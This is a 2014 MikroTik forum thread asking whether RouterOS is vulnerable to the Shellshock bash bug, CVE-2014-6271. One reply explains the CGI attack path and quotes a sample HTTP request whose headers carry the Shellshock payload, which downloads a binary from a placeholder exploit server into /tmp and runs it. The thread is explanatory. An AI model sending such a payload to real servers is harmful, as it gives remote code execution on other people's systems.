Community discussions

MikroTik App
 
dw5304
Frequent Visitor
Frequent Visitor
Topic Author
Posts: 51
Joined: Tue Apr 12, 2011 9:36 pm

CVE-2014-6271 (shellshock) bash bug is mikrotik affected?

Thu Sep 25, 2014 5:52 pm

with the recent announcements of attacks being open in the wild is mikrotik affected by this bug?
If so is their a patch in the works?
 
tbifulco
just joined
Posts: 4
Joined: Thu May 30, 2013 6:29 pm

Re: CVE-2014-6271 (shellshock) bash bug is mikrotik affected

Thu Sep 25, 2014 8:16 pm

I would like to know this as well I am assuming the Mikrotik is vulnerable.

Thanks,
-tb
 
User avatar
boen_robot
Forum Guru
Forum Guru
Posts: 2411
Joined: Thu Aug 31, 2006 4:43 pm
Location: europe://Bulgaria/Plovdiv

Re: CVE-2014-6271 (shellshock) bash bug is mikrotik affected

Thu Sep 25, 2014 8:19 pm

If I understand the bug correctly, the problem is that specifically crafted environment variables can turn into executable code.

If that's the case, then surely MikroTik is not affected, since at no point does it let the user run custom executable files on it, let alone execute them with environment variables.


The only way in which I could see MikroTik possibly being affected is if the CLI parser is a front-end to what eventually becomes a bash command with environment variables, where the environment variables are actually the command arguments. If that's the case, then perhaps some cleverly crafted arguments could trigger custom executable code... But to actually exploit this hypothetical vulnerability, one needs to have access to the router to begin with.

EDIT: Aaaannd... Like I thought... No bash involved.
Last edited by boen_robot on Thu Sep 25, 2014 8:27 pm, edited 2 times in total.
PEAR2_Net_RouterOS(1.0.0b6) - My API client in PHP
(Rate my posts? If you want... no pressure...)
 
 
jdub
just joined
Posts: 11
Joined: Fri Jan 10, 2014 3:40 pm

Re: CVE-2014-6271 (shellshock) bash bug is mikrotik affected

Fri Sep 26, 2014 6:12 pm

If I understand the bug correctly, the problem is that specifically crafted environment variables can turn into executable code.

If that's the case, then surely MikroTik is not affected, since at no point does it let the user run custom executable files on it, let alone execute them with environment variables.
EDIT: Aaaannd... Like I thought... No bash involved.
That's the only saving grace, as a system doesn't have to allow custom executables to be vulnerable. Imagine this scenario:

1. You send the following query to a web server. The headers automatically get dumped into environmental variables, for later use by CGI scripts.

GET./.HTTP/1.0
.User-Agent:.Thanks-Rob
.Cookie:().{.:;.};.wget.-O./tmp/besh.http://<exploitserver>/nginx;.chmod.777./tmp/besh;./tmp/besh;
.Host:().{.:;.};.wget.-O./tmp/besh.http://<exploitserver>/nginx;.chmod.777./tmp/besh;./tmp/besh;
.Referer:().{.:;.};.wget.-O./tmp/besh.http://<exploitserver>/nginx;.chmod.777./tmp/besh;./tmp/besh;
.Accept:.*/*

2. The get request leads to a CGI script, let's say in Perl.

3. Perl needs to make a change somewhere, and for convenience does it via a "system()" call, which executes bash.

4. Bash has now been run with an exploit in its environmental variables. Game, set, match.

Apparently there's a similar mechanism in the dhclient daemon.

See:
https://isc.sans.edu/forums/diary/Updat ... ock+/18707
https://github.com/CriticalStack/bro-sc ... -2014-6271

Who is online

Users browsing this forum: cbpapi and 48 guests